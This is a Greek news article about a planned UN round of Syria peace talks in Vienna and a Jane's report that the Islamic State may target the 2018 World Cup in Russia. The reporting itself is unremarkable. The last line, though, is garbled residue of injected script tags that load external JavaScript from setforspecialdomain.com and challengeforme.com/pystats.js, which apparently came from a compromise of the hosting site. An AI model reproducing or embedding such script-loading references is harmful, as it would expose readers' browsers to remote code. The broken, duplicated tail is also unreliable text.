Νέος γύρος ειρηνευτικών συνομιλιών για τη Συρία – Στόχος του Ισλαμικού Κράτους το Μουντιάλ της Ρωσίας;

Νέος γύρος συνομιλιών για την ειρήνευση στη Συρία θα διεξαχθεί την 25η και 26η Ιανουαρίου στη Βιέννη, υπό την αιγίδα των Ηνωμένων Εθνών.

Όπως διευκρίνισε ο ο επιτετραμμένος του ΟΗΕ για τη συριακή κρίση, Στάφαν ντε Μιστούρα, σε ανακοίνωσή του, οι συνομιλίες πρόκειται να διεξαχθούν για «λόγους που αφορούν την υλικοτεχνική υποστήριξη», στα «γραφεία των Ηνωμένων Εθνών στη Βιέννη».

Παράλληλα, πρόσθεσε πως «περιμένει οι αντιπροσωπείες να προσέλθουν στη Βιέννη έτοιμες να δεσμευθούν» για τα υπό συζήτηση θέματα, «πιο συγκεκριμένα στην πτυχή του (νέου) Συντάγματος» της Συρίας.

Υπενθυμίζεται ότι στον 8ο γύρο των συνομιλιών υπό την αιγίδα του ΟΗΕ, που διεξήχθη όπως συμβαίνει τις περισσότερες φορές στη Γενεύη, στις αρχές του Δεκεμβρίου, για άλλη μια φορά δεν επιτεύχθηκε πρόοδος, καθώς και πάλι το εμπόδιο ήταν το μέλλον του προέδρου Μπασάρ αλ Άσαντ. Ο επιτετραμμένος του ΟΗΕ επέρριψε τότε την ευθύνη για την αποτυχία στη Δαμασκό.

Από την πλευρά του, ο Αμερικανός υπουργός Εξωτερικών, Ρεξ Τίλερσον, ανέφερε στη διάρκεια ομιλίας του στο Στάνφορντ για τη Συρία ότι «η Ρωσία οφείλει να εντείνει την πίεση στο συριακό καθεστώς, όχι μόνο για να πάει στη Βιέννη», για τον νέο γύρο των ειρηνευτικών συνομιλιών, αλλά και «για να συμμετάσχει με αξιόπιστο τρόπο στις προσπάθειες του ΟΗΕ, θέτοντας σε εφαρμογή τις αποφάσεις που θα ληφθούν».

Η Μόσχα, ένας από τους σημαντικότερους συμμάχους του Άσαντ, «έχει σημαντικό ρόλο να διαδραματίσει για να πειστεί», υπογράμμισε ο επικεφαλής του Στέιτ Ντιπάρτμεντ.

 

Στόχος του Ισλαμικού Κράτους το Μουντιάλ της Ρωσίας;

Το Παγκόσμιο Κύπελλο ποδοσφαίρου το οποίο πρόκειται να διεξαχθεί στη Ρωσία τον Ιούλιο και τον Ιούνιο θα είναι ένας εξαιρετικά «ελκυστικός στόχος» για τους τζιχαντιστές του Ισλαμικού Κράτους, σύμφωνα με έκθεση του κέντρου αναλύσεων για την τρομοκρατία και τις ένοπλες εξεγέρσεις σε διεθνές επίπεδο του περιοδικού για αμυντικά θέματα Jane’s, που εδρεύει στο Λονδίνο.

«Μια επιτυχημένη επίθεση (στη Ρωσία) θα έδινε τρομερή ώθηση από την άποψη της προπαγάνδας στο Ισλαμικό Κράτος, τους μαχητές και τους υποστηρικτές του, υπογραμμίζοντας τη συνεχιζόμενη διεθνή απειλή που εγείρει η οργάνωση» παρά τις εδαφικές απώλειές του και τη σχεδόν ολοκληρωτική ήττα του στο Ιράκ και στη Συρία, σύμφωνα με την έκθεση, όπως μεταδίδει το Reuters και αναμεταδίδει το Αθηναϊκό Πρακτορείο Ειδήσεων.

Η συμμετοχή εθνικών ομάδων ποδοσφαίρου χωρών όπως η Σαουδική Αραβία και το Ιράν στο τουρνουά δίνει ακόμη μεγαλύτερο κίνητρο στους τζιχαντιστές να στοχοθετήσουν αυτή τη διοργάνωση, σύμφωνα με την έκθεση του Jane’s Terrorism and Insurgency Centre (JTIC).

Παρότι έχασε ουσιαστικά όλα τα εδάφη που κατείχε στο Ιράκ και στη Συρία ως τον Νοέμβριο του 2017, η οργάνωση ανέλαβε την ευθύνη για μείζονες τρομοκρατικές ενέργειες στην Κωνσταντινούπολη, στο Λονδίνο, στο Μάντσεστερ, στη Βαρκελόνη και στην Τεχεράνη, που προκάλεσαν δεκάδες θανάτους πολιτών.

Το Ισλαμικό Κράτος είχε βάλει στο στόχαστρό του την ιερή για τους μουσουλμάνους πόλη της Μεδίνας, στη Σαουδική Αραβία, το 2016.

Ο ηγέτης του ΙΚ Αμπού Μπακρ αλ Μπαγκντάντι πιστεύεται πως ακόμη διαφεύγει παρά την κατάρρευση του «χαλιφάτου» την εγκαθίδρυση του οποίου ανακήρυσσε το 2014 σε τμήματα της Συρίας και του Ιράκ.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>